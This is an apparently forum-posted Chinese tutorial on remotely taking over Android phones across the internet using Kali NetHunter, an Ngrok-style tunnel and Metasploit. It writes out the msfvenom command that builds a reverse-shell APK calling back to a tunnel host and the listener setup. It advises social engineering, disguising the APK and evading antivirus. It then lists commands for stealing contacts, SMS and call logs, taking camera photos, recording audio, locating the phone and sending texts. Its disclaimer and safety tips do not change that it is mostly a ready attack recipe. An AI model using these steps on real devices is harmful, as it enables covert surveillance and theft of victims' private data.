声明:本文旨在用于黑客技术学习和交流,切勿用于非法用途! 本人小白,肯定有很多不专业的地方,大佬轻喷
注: 本教程出自X网络科技,作者:skilfulwriter QQ:2234798500 团队qq群:603791426
在前几期当中,《https://www.bilibili.com/read/cv3576810》
在有一篇有关 利用Kali Linux NetHunter手机零基础教程进行实施渗透攻击 MSF 攻击我们确实学习了如何通过kali nethunter android设备入侵安卓手机的教程,但仅限于局域网,也就是同一WIFI情况下,但是如果我们想访问未连接到网络的设备或者说其他网络呢,该怎么办?现在我们将继续学习如何使用Metasploit框架来破解外网Android手机。Android设备在全球范围内发展非常迅速,实际上使用了Linux系统的许多核心功能。这就是为什么选择Android是学习移动渗透测试的最佳方法的原因。我们收到来自社交渠道上的人的询问;“如何破解Android手机”,因此请考虑制作一个视频教程。在这里,我们使用Kali nethunter安卓手机攻击目标。目标已设置为Android Phone,为此我们正在使用Android虚拟机。当然,虚拟Android和物理Android设备之间会有一些限制和差异,但出于学习渗透测试的目的,建议在虚拟设备上进行此测试。
我们将使用msfvenom创建有效负载并将其另存为apk文件。生成有效负载后,我们需要设置Metasploit框架的侦听器。一旦目标下载并安装了恶意apk,攻击者就可以轻松地在Metasploit上重新获得一个会话。攻击者需要进行一些社交工程,才能在受害者的移动设备上安装apk
通常在WAN中,首先,您需要有一个静态IP /主机名,其次,您需要进行端口转发以允许您的流量传输,而且我们都知道这两种实时性非常困难,因为我们无法访问网络中的端口因此,在这种情况下,我们将使用Ngrok建立安全的隧道。
Ngrok是一种隧道反向代理系统,可建立从公共端点(即Internet到本地运行的网络服务)的隧道。这可以帮助我们为在本机本地运行的网站创建公共HTTP / HTTPS URL。使用Ngrok时,我们不需要进行任何类型的端口转发,并且我们的网络服务最终将在TCP隧道的帮助下暴露于Internet。
分步演示:步骤01:在Ngrok上创建一个要下载的帐户
首先,您需要在Kali nethunter安卓手机中安装Ngrok。
您必须先注册一个帐户。转到注册选项,并填写所有必填字段。然后登录:上面也有些详细介绍,
注册后,您可以下载如下图所示的Linux的ARM版的ngrok安装程序。因为我们使用的是kali nethhunter手机是基于ARM Linux的,上面两个版本分别是电脑版32位系统和64位系统的版本
步骤02:解压缩下载的文件
转到你下载文件所在的下载目录复制在kali nethunter的你所熟悉的目录当中,如图所示:
然后你必须解压缩该文件。使用unzip命令解压缩文件。打开kali nethunter终端输入命令解压,当然你也可以直接把文件解压到kali nethunter目录中,如图所示:
浏览Ngrok以访问其官方网站开通隧道,添加转发kali nethunter本地IP地址,(ps:不知道本地IP的打开kali nethunter终端输入ifconfig查看或者kali nethunetr APP查看)和你所有监听的端口(端口随便填),那么你如果kali nethunter的内网IP地址换了也要相对应的修改IP地址,官网上也有很详细的介绍如图所示:
步骤03:复制提供给您帐户的iD并开启转发功能设置好ngrok隧道之后就打开指定的sunny路径运行端口转发脚本。我们用kali nethunter终端输入命令,路径一定要是你刚刚解压出来到kali nethunter目录当中的哪个路径输入如图所示命令运行脚本:./sunny clientid id(id如图所示)
这是端口转发成功运行的样子如图所示:
步骤04:使用msfvenom生成有效负载使用msfvenom工具,该工具将生成有效载荷以穿透Android设备。输入命令:msfvenom -p android/meterpreter/reverse_tcp \LHOST=vipgz4.idcfengye.com LPORT=10076 \> ‘/var/www/html/sss.apk’
注意看:
· -p表示有效载荷类型
· android / metepreter / reverse_tcp指定将从目标Android设备传入的反向meterpreter shell
· LHOST是您的隧道的IP
· LPORT设置为侦听端口,端口填刚才客户端给的端口
· > / var / www / html将直接在apache服务器上提供输出(为了演示我直接用我的kali nethunter服务器的路径,你们随意你所熟悉的路径)
· apk是最终输出的最终名称
生成将近一万字节的apk文件将花费一些时间。如图:
一切似乎都已完成,现在启动msfconsole。使用多重/处理程序利用,将有效负载设置为预先生成的相同,将LHOST和LPORT值设置为与有效负载中使用的相同,最后键入利用以发起攻击。
步骤05:启动反向TCP处理程序
启动Metasploit框架
在 Kalinethunter 终端输入msfconsole命令启动Metasploit框架:依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:将exploit设置为multi / handler,将Lhost设置为localhost,即0.0.0.0,将Lport设置为4242,(你刚在隧道转发的本地端口),然后运行exploit。进入监听状态,等待目标手机上线(用户点击木马程序)
msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Payloadset lhost 0.0.00 //这里的地址设置成 0.0.0.0
set lport 4242 //这里的端口设置成刚才我们隧道转发的本地端口exploit //开始执行漏洞,开始监听,等待手机上线
在现实生活中,可以使用某些社交工程技术让目标用户下载恶意apk文件。为了演示,我们只是用模拟器访问攻击者机器以在Android设备中下载文件。当然你也可以继续看步骤6,ps:在这一步的基础上你可以对此APK进行一个伪装处理,比如修改图片,名称,加固,免杀之类的
步骤06:将有效负载下载到您的Android手机上,以获取会话
要在Android设备上下载此有效负载,我们将其上传到www.upload.ee,这是一个非常有用的网站,可安全且匿名地上传文件。
在您的Android手机上浏览此链接,它将下载我们有效负载的zip文件。解压缩并将其安装在手机中。(允许选择从第三方来源安装它)
从Android手机安装并运行该应用程序后,我在Kali nethunter安卓手机攻击机上进行了一次会话。一旦用户安装并运行该应用程序,就会在攻击端立即打开Meterepreter会话。
这就是您实际上可以利用Android手机并通过Internet而不是在局域网上远程访问的方式。进行会话后,您知道攻击者可以轻松获取您的信息,窃取您的联系人,消息,应用程序数据等等。因此,如果您不了解电话,那么访问手机就容易得多。
此漏洞利用程序已在Android版本9.0(不是旧版本)上进行了测试,目前已被许多用户使用。保护您的Android设备安全的一个健康提示是,即使您确实要安装它,也不要从未知来源安装任何应用程序,请尝试阅读并检查其源代码,以了解此文件是否为恶意文件。
您可以通过键入session -i [session ID]与任何会话进行交互。
进入会话后,键入“ help”以列出我们可以在此会话中提出的所有命令。此时输入help命令可查看具体的攻击命令和描述,后面将选择几个进行演示:当您尝试获取一些敏感信息或数据时,可以看到一些有用的文件系统命令。通过使用这些,您可以轻松下载或上传任何文件或信息。
您还将找到一些网络命令,包括portfwd和route
一些强大的系统命令可获取用户ID,获取Shell或获取完整的系统信息。
输入“ app_list”,它将显示设备上所有已安装的应用程序
我们还可以从Android设备上卸载任何应用
从Android设备提取联系人
现在,通过键入“转储”和双标签,从目标设备中提取一些联系人
它将显示从设备提取的所有选项。输入“ dump_contacts”并输入
它将从Android设备中提取所有联系人,并将其保存在我们的本地目录中。也就是kali nethunter目录,要查看此文件,请键入“ ls”和“ cat [file_name]”
同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。
这将显示先前从目标设备下载的联系人文件的内容。此信息确实很敏感,并且可能被黑客利用。
摄像机拍摄
在攻击会话中执行命令webcam_snap,可开启受害者的摄像头自动拍摄一张照片并保存到Kali nethunter 手机根目录当中,下图所示的命令回馈由于我们用的是手机不像电脑那样直接打开图片,但它保存在了本地我们依然可以查看如图:
查看手机是否root过
check_root
控制目标手机发送短信
send_sms -d 某个手机号码 -t “hello”
查看系统信息
sysinfo
对手机进行定位
wlan_geolocate // 使用WLAN信息获取当前地理位置
geolocate // 利用地理定位(GPS)获取当前LAT
调用手机摄像头
webcam_list // 列出网络摄像头
webcam_snap 1/2
webcam_chat // 开始视频聊天
webcam_snap // 从指定的摄像头获取快照
webcam_stream -i 1 // 从指定的网络摄像头播放视频流
调用麦克风
record_mic -d x // 从默认麦克风录制音频为X秒
此命令默认录制默认麦克风录制1秒钟的音频,并将尝试不带精度的参数来播放捕获的音频wav文件。
获取通讯记录信息
dump_calllog // 下载目标手机上的通话记录dump_contacts // 获取联系人列表dump_sms // 获取短信
来个比较有意思的。现在让我远程强制修改我手机的壁图案。继续输入命令如下:
msf > use post/multi/manage/set_wallpaper
msf post (set_wallpaper)>set WALLPAPER_FILE /root/5.jpg
msf post (set_wallpaper)>set session 1
msf post (set_wallpaper)>exploit
更多命令如下:
execute 执行一个命令
getuid 获取当前运行的用户
localtime 显示目标系统的本地日期和时间
pgrep 按名称筛选进程
ps 列出正在运行的进程
用户界面命令
===============================
screenshare 实时监视远程用户的桌面
screenshot 抓取交互式桌面的屏幕截图
音频输出命令
=============================
play 在目标系统上播放波形音频文件(.wav)
应用程序控制器命令
===============================
app_install 请求安装apk文件
app_list 列出设备中已安装的应用程序
app_run 启动包名称的主活动
app_uninstall 请求卸载apk文件
meterpreter中提供了许多其他命令。进一步尝试探索和学习我们可以在Android设备上执行的操作。得出的结论是,我们已经使用Kali nethunter Linux和Metasploit-Framework成功渗透了Android设备。
保护您的Android设备安全的一个健康提示是,即使您确实要安装它,也不要从未知来源安装任何应用程序,请尝试阅读并检查其源代码,以了解此文件是否为恶意文件。
因此,我希望它能回答最常见的问题,即如何破解Android手机。
至此,本次Kalinethunter安卓手机生成远控木马后攻击外网内Android手机的演示结束,其他攻击操作读者有兴趣的话可自行借助help命令给出的攻击命令描述进行体验。
温馨提醒:此次演示中的木马程序没有图形化界面的伪装,真实的环境中攻击者会将其伪装得跟正常软件一样,这提醒了我们不要轻易安装安全性未知的软件,同时也不要轻易连接公共WIFI,让自己的设备暴露在攻击者搭建的局域网下……
|
没有回复内容